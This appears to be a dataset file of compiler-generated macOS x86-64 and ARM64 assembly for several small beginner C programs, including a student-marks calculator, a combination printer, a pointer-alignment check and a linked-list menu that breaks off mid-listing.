.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $12112, %eax ## imm = 0x2F50 callq ____chkstk_darwin subq %rax, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -12108(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq -12096(%rbp), %rdi movl -12108(%rbp), %esi callq _input_students leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -12112(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq -12096(%rbp), %rdi movl -12112(%rbp), %esi callq _input_subjects leaq -12096(%rbp), %rdi movl -12108(%rbp), %esi movl -12112(%rbp), %edx callq _input_marks leaq -12096(%rbp), %rdi movl -12108(%rbp), %esi movl -12112(%rbp), %edx callq _calculate leaq -12096(%rbp), %rdi movl -12108(%rbp), %esi movl -12112(%rbp), %edx callq _print_results movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_2 ## %bb.1: xorl %eax, %eax addq $12112, %rsp ## imm = 0x2F50 popq %rbp retq LBB0_2: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _input_students ## -- Begin function input_students .p2align 4, 0x90 _input_students: ## @input_students .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $0, -16(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jge LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movl -16(%rbp), %esi addl $1, %esi leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rsi movslq -16(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi leaq L_.str.6(%rip), %rdi movb $0, %al callq _scanf movl -16(%rbp), %esi addl $1, %esi leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rsi movslq -16(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi addq $20, %rsi leaq L_.str.6(%rip), %rdi movb $0, %al callq _scanf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB1_1 LBB1_4: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _input_subjects ## -- Begin function input_subjects .p2align 4, 0x90 _input_subjects: ## @input_subjects .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) leaq L_.str.8(%rip), %rdi movb $0, %al callq _printf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $0, -16(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jge LBB2_4 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movl -16(%rbp), %esi addl $1, %esi leaq L_.str.9(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rsi movslq -16(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi addq $124, %rsi movslq -16(%rbp), %rax imulq $24, %rax, %rax addq %rax, %rsi leaq L_.str.6(%rip), %rdi movb $0, %al callq _scanf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB2_1 LBB2_4: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _input_marks ## -- Begin function input_marks .p2align 4, 0x90 _input_marks: ## @input_marks .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) movl $0, -20(%rbp) LBB3_1: ## =>This Loop Header: Depth=1 ## Child Loop BB3_3 Depth 2 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB3_8 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movl -20(%rbp), %esi addl $1, %esi movq -8(%rbp), %rdx movslq -20(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rdx movq -8(%rbp), %rcx movslq -20(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rcx addq $20, %rcx leaq L_.str.10(%rip), %rdi movb $0, %al callq _printf movl $0, -24(%rbp) LBB3_3: ## Parent Loop BB3_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -24(%rbp), %eax cmpl -16(%rbp), %eax jge LBB3_6 ## %bb.4: ## in Loop: Header=BB3_3 Depth=2 movq -8(%rbp), %rsi movslq -24(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi addq $124, %rsi movslq -24(%rbp), %rax imulq $24, %rax, %rax addq %rax, %rsi leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf movq -8(%rbp), %rsi movslq -20(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi addq $40, %rsi movslq -24(%rbp), %rax shlq $2, %rax addq %rax, %rsi leaq L_.str.12(%rip), %rdi movb $0, %al callq _scanf ## %bb.5: ## in Loop: Header=BB3_3 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB3_3 LBB3_6: ## in Loop: Header=BB3_1 Depth=1 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.7: ## in Loop: Header=BB3_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB3_1 LBB3_8: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _calculate ## -- Begin function calculate .p2align 4, 0x90 _calculate: ## @calculate .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) movl $0, -20(%rbp) LBB4_1: ## =>This Loop Header: Depth=1 ## Child Loop BB4_3 Depth 2 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_8 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 movq _student_total@GOTPCREL(%rip), %rax xorps %xmm0, %xmm0 movss %xmm0, (%rax) movl $0, -24(%rbp) LBB4_3: ## Parent Loop BB4_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -24(%rbp), %eax cmpl -16(%rbp), %eax jge LBB4_6 ## %bb.4: ## in Loop: Header=BB4_3 Depth=2 movq -8(%rbp), %rax movslq -20(%rbp), %rcx imulq $604, %rcx, %rcx ## imm = 0x25C addq %rcx, %rax movslq -24(%rbp), %rcx movss 40(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _student_total@GOTPCREL(%rip), %rax addss (%rax), %xmm0 movq _student_total@GOTPCREL(%rip), %rax movss %xmm0, (%rax) ## %bb.5: ## in Loop: Header=BB4_3 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB4_3 LBB4_6: ## in Loop: Header=BB4_1 Depth=1 movq _student_total@GOTPCREL(%rip), %rax movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero movslq -20(%rbp), %rcx movq _students_total@GOTPCREL(%rip), %rax movss %xmm0, (%rax,%rcx,4) ## %bb.7: ## in Loop: Header=BB4_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_1 LBB4_8: leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $0, -20(%rbp) LBB4_9: ## =>This Loop Header: Depth=1 ## Child Loop BB4_11 Depth 2 movl -20(%rbp), %eax cmpl -16(%rbp), %eax jge LBB4_18 ## %bb.10: ## in Loop: Header=BB4_9 Depth=1 movq _subject_total@GOTPCREL(%rip), %rax xorps %xmm0, %xmm0 movss %xmm0, (%rax) movl $0, -24(%rbp) LBB4_11: ## Parent Loop BB4_9 Depth=1 ## => This Inner Loop Header: Depth=2 movl -24(%rbp), %eax cmpl -12(%rbp), %eax jge LBB4_16 ## %bb.12: ## in Loop: Header=BB4_11 Depth=2 movq -8(%rbp), %rax movslq -24(%rbp), %rcx imulq $604, %rcx, %rcx ## imm = 0x25C addq %rcx, %rax movslq -20(%rbp), %rcx movss 40(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movq _subject_total@GOTPCREL(%rip), %rax addss (%rax), %xmm0 movq _subject_total@GOTPCREL(%rip), %rax movss %xmm0, (%rax) movq -8(%rbp), %rax movslq -24(%rbp), %rcx imulq $604, %rcx, %rcx ## imm = 0x25C addq %rcx, %rax movslq -20(%rbp), %rcx movss 40(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero ucomiss _student_highest(%rip), %xmm0 jbe LBB4_14 ## %bb.13: ## in Loop: Header=BB4_11 Depth=2 movq -8(%rbp), %rax movslq -24(%rbp), %rcx imulq $604, %rcx, %rcx ## imm = 0x25C addq %rcx, %rax movslq -20(%rbp), %rcx movss 40(%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, _student_highest(%rip) movl -24(%rbp), %eax movl %eax, -28(%rbp) LBB4_14: ## in Loop: Header=BB4_11 Depth=2 jmp LBB4_15 LBB4_15: ## in Loop: Header=BB4_11 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB4_11 LBB4_16: ## in Loop: Header=BB4_9 Depth=1 movl -28(%rbp), %edx movslq -20(%rbp), %rcx movq _student_highest_index@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) xorps %xmm0, %xmm0 movss %xmm0, _student_highest(%rip) movq _subject_total@GOTPCREL(%rip), %rax movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero movslq -20(%rbp), %rcx movq _subjects_total@GOTPCREL(%rip), %rax movss %xmm0, (%rax,%rcx,4) ## %bb.17: ## in Loop: Header=BB4_9 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_9 LBB4_18: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function print_results LCPI5_0: .long 0x42c80000 ## float 100 .section __TEXT,__text,regular,pure_instructions .globl _print_results .p2align 4, 0x90 _print_results: ## @print_results .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) leaq L_.str.13(%rip), %rdi movb $0, %al callq _printf movl $0, -20(%rbp) LBB5_1: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB5_4 ## %bb.2: ## in Loop: Header=BB5_1 Depth=1 movq -8(%rbp), %rsi movslq -20(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi movq -8(%rbp), %rdx movslq -20(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rdx addq $20, %rdx leaq L_.str.14(%rip), %rdi movb $0, %al callq _printf movslq -20(%rbp), %rcx movq _students_total@GOTPCREL(%rip), %rax movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 leaq L_.str.15(%rip), %rdi movb $1, %al callq _printf movslq -20(%rbp), %rcx movq _students_total@GOTPCREL(%rip), %rax movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero imull $100, -16(%rbp), %eax cvtsi2ss %eax, %xmm1 divss %xmm1, %xmm0 movss LCPI5_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 cvtss2sd %xmm0, %xmm0 leaq L_.str.16(%rip), %rdi movb $1, %al callq _printf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB5_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB5_1 LBB5_4: leaq L_.str.17(%rip), %rdi movb $0, %al callq _printf movl $0, -20(%rbp) LBB5_5: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -16(%rbp), %eax jge LBB5_8 ## %bb.6: ## in Loop: Header=BB5_5 Depth=1 movq -8(%rbp), %rsi movslq -20(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi addq $124, %rsi movslq -20(%rbp), %rax imulq $24, %rax, %rax addq %rax, %rsi leaq L_.str.18(%rip), %rdi movb $0, %al callq _printf movslq -20(%rbp), %rcx movq _subjects_total@GOTPCREL(%rip), %rax movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 leaq L_.str.15(%rip), %rdi movb $1, %al callq _printf movslq -20(%rbp), %rcx movq _subjects_total@GOTPCREL(%rip), %rax movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero imull $100, -16(%rbp), %eax cvtsi2ss %eax, %xmm1 divss %xmm1, %xmm0 movss LCPI5_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 cvtss2sd %xmm0, %xmm0 leaq L_.str.16(%rip), %rdi movb $1, %al callq _printf leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.7: ## in Loop: Header=BB5_5 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB5_5 LBB5_8: leaq L_.str.19(%rip), %rdi movb $0, %al callq _printf movl $0, -20(%rbp) LBB5_9: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -16(%rbp), %eax jge LBB5_12 ## %bb.10: ## in Loop: Header=BB5_9 Depth=1 movq -8(%rbp), %rsi movslq -20(%rbp), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi addq $124, %rsi movslq -20(%rbp), %rax imulq $24, %rax, %rax addq %rax, %rsi movq -8(%rbp), %rdx movslq -20(%rbp), %rcx movq _student_highest_index@GOTPCREL(%rip), %rax movslq (%rax,%rcx,4), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rdx leaq L_.str.20(%rip), %rdi movb $0, %al callq _printf ## %bb.11: ## in Loop: Header=BB5_9 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB5_9 LBB5_12: leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq L_.str.21(%rip), %rdi movb $0, %al callq _printf xorps %xmm0, %xmm0 movss %xmm0, -28(%rbp) movl $0, -20(%rbp) LBB5_13: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -12(%rbp), %eax jge LBB5_18 ## %bb.14: ## in Loop: Header=BB5_13 Depth=1 movslq -20(%rbp), %rcx movq _students_total@GOTPCREL(%rip), %rax movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero ucomiss -28(%rbp), %xmm0 jbe LBB5_16 ## %bb.15: ## in Loop: Header=BB5_13 Depth=1 movslq -20(%rbp), %rcx movq _students_total@GOTPCREL(%rip), %rax movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -28(%rbp) movl -20(%rbp), %ecx movq _student_highest_total_index@GOTPCREL(%rip), %rax movl %ecx, (%rax) LBB5_16: ## in Loop: Header=BB5_13 Depth=1 jmp LBB5_17 LBB5_17: ## in Loop: Header=BB5_13 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB5_13 LBB5_18: movq -8(%rbp), %rsi movq _student_highest_total_index@GOTPCREL(%rip), %rax movslq (%rax), %rax imulq $604, %rax, %rax ## imm = 0x25C addq %rax, %rsi leaq L_.str.22(%rip), %rdi movb $0, %al callq _printf addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _student_highest ## @student_highest .zerofill __DATA,__common,_student_highest,4,2 .globl _subject_highest ## @subject_highest .zerofill __DATA,__common,_subject_highest,4,2 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter number of students (less than 20): \n" L_.str.1: ## @.str.1 .asciz "%d" L_.str.2: ## @.str.2 .asciz "\n" L_.str.3: ## @.str.3 .asciz "Enter number of subjects per student (less than 10): \n" L_.str.4: ## @.str.4 .asciz "Enter student details: \n" L_.str.5: ## @.str.5 .asciz "Enter student %d name: \n" L_.str.6: ## @.str.6 .asciz "%s" L_.str.7: ## @.str.7 .asciz "Enter student %d roll: \n" L_.str.8: ## @.str.8 .asciz "Enter subject details: \n" L_.str.9: ## @.str.9 .asciz "Enter subject %d name: \n" L_.str.10: ## @.str.10 .asciz "Enter student %d, %s, %s for the following subjects: \n" L_.str.11: ## @.str.11 .asciz "%s marks: " L_.str.12: ## @.str.12 .asciz "%f" .comm _student_total,4,2 ## @student_total .comm _students_total,80,4 ## @students_total .comm _subject_total,4,2 ## @subject_total .comm _student_highest_index,80,4 ## @student_highest_index .comm _subjects_total,80,4 ## @subjects_total L_.str.13: ## @.str.13 .asciz "Total - Marks of Students: \n\n" L_.str.14: ## @.str.14 .asciz "Marks of %s, Roll: %s\n" L_.str.15: ## @.str.15 .asciz "Total: %f\n" L_.str.16: ## @.str.16 .asciz "Percentage: %f\n" L_.str.17: ## @.str.17 .asciz "Total - Marks of Subjects: \n\n" L_.str.18: ## @.str.18 .asciz "Marks of %s: \n" L_.str.19: ## @.str.19 .asciz "Subject wise - Highest: \n\n" L_.str.20: ## @.str.20 .asciz "Highest in %s is %s\n" L_.str.21: ## @.str.21 .asciz "Student wise - Overall Highest: \n\n" .comm _student_highest_total_index,4,2 ## @student_highest_total_index L_.str.22: ## @.str.22 .asciz "%s\n" .comm _subject_highest_index,80,4 ## @subject_highest_index .comm _subject_highest_total_index,4,2 ## @subject_highest_total_index .subsections_via_symbols
the_stack_data/7950881.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #8] ; 4-byte Folded Spill stur wzr, [x29, #-4] mov w0, #1 bl _ft_print_combn mov w0, #110 str w0, [sp, #4] ; 4-byte Folded Spill bl _ft_putchar mov w0, #2 bl _ft_print_combn ldr w0, [sp, #4] ; 4-byte Folded Reload bl _ft_putchar mov w0, #4 bl _ft_print_combn ldr w0, [sp, #4] ; 4-byte Folded Reload bl _ft_putchar mov w0, #8 bl _ft_print_combn ldr w0, [sp, #4] ; 4-byte Folded Reload bl _ft_putchar ldr w0, [sp, #8] ; 4-byte Folded Reload ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $1, %edi callq _ft_print_combn movl $110, %edi callq _ft_putchar movl $2, %edi callq _ft_print_combn movl $110, %edi callq _ft_putchar movl $4, %edi callq _ft_print_combn movl $110, %edi callq _ft_putchar movl $8, %edi callq _ft_print_combn movl $110, %edi callq _ft_putchar xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/12637167.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x0, #1 bl _malloc stur x0, [x29, #-16] ldur x8, [x29, #-16] str x8, [sp, #24] ldur x0, [x29, #-16] bl _free ldur x8, [x29, #-16] mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w8, #2 str w8, [sp, #20] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #64 cset w8, gt tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #20] ; implicit-def: $x10 mov x10, x8 ldr x8, [sp, #24] ldrsw x11, [sp, #20] udiv x9, x8, x11 mul x9, x9, x11 subs x8, x8, x9 subs x8, x8, #0 cset w8, ne and w11, w8, #0x1 adrp x9, l_.str.3@PAGE add x9, x9, l_.str.3@PAGEOFF adrp x8, l_.str.2@PAGE add x8, x8, l_.str.2@PAGEOFF ands w11, w11, #0x1 csel x8, x8, x9, ne mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #20] lsl w8, w8, #1 str w8, [sp, #20] b LBB0_1 LBB0_4: mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%p\n" l_.str.1: ; @.str.1 .asciz "%02d -> %s\n" l_.str.2: ; @.str.2 .asciz "no" l_.str.3: ; @.str.3 .asciz "yes" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl $1, %edi callq _malloc movq %rax, -16(%rbp) movq -16(%rbp), %rax movq %rax, -24(%rbp) movq -16(%rbp), %rdi callq _free movq -16(%rbp), %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl $2, -28(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $64, -28(%rbp) jg LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -28(%rbp), %esi movq -24(%rbp), %rax movslq -28(%rbp), %rcx xorl %edx, %edx ## kill: def $rdx killed $edx divq %rcx movq %rdx, %rcx leaq L_.str.3(%rip), %rdx leaq L_.str.2(%rip), %rax cmpq $0, %rcx cmovneq %rax, %rdx leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -28(%rbp), %eax shll $1, %eax movl %eax, -28(%rbp) jmp LBB0_1 LBB0_4: xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%p\n" L_.str.1: ## @.str.1 .asciz "%02d -> %s\n" L_.str.2: ## @.str.2 .asciz "no" L_.str.3: ## @.str.3 .asciz "yes" .subsections_via_symbols
the_stack_data/25136859.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov w8, #1 stur w8, [x29, #-16] ; kill: def $x8 killed $xzr stur xzr, [x29, #-24] stur xzr, [x29, #-32] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-16] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_15 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF str x0, [sp, #40] ; 8-byte Folded Spill bl _printf adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf ldr x0, [sp, #40] ; 8-byte Folded Reload bl _printf mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _scanf ldur w8, [x29, #-8] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF bl _printf bl _Create stur x0, [x29, #-24] b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] subs w8, w8, #2 cset w8, ne tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldur x0, [x29, #-24] bl _Printlinklist b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] subs w8, w8, #3 cset w8, ne tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF bl _printf mov x9, sp sub x8, x29, #12 str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _scanf ldur x0, [x29, #-24] ldur w1, [x29, #-12] bl _Del b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] subs w8, w8, #4 cset w8, ne tbnz w8, #0, LBB0_10 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _printf adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _printf mov x0, #48 bl _malloc stur x0, [x29, #-32] ldur x12, [x29, #-32] ldur x8, [x29, #-32] add x11, x8, #4 ldur x8, [x29, #-32] add x10, x8, #24 ldur x8, [x29, #-32] add x8, x8, #36 mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _scanf adrp x0, l_.str.16@PAGE add x0, x0, l_.str.16@PAGEOFF bl _printf adrp x0, l_.str.17@PAGE add x0, x0, l_.str.17@PAGEOFF bl _printf mov x9, sp sub x8, x29, #12 str x8, [x9] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _scanf ldur x0, [x29, #-24] ldur w1, [x29, #-12] ldur x2, [x29, #-32] bl _Insert b LBB0_10 LBB0_10: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_12 b LBB0_11 LBB0_11: adrp x0, l_.str.18@PAGE add x0, x0, l_.str.18@PAGEOFF bl _printf b LBB0_15 LBB0_12: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] subs w8, w8, #9 cset w8, ne tbnz w8, #0, LBB0_14 b LBB0_13 LBB0_13: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.19@PAGE add x0, x0, l_.str.19@PAGEOFF bl _printf b LBB0_14 LBB0_14: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 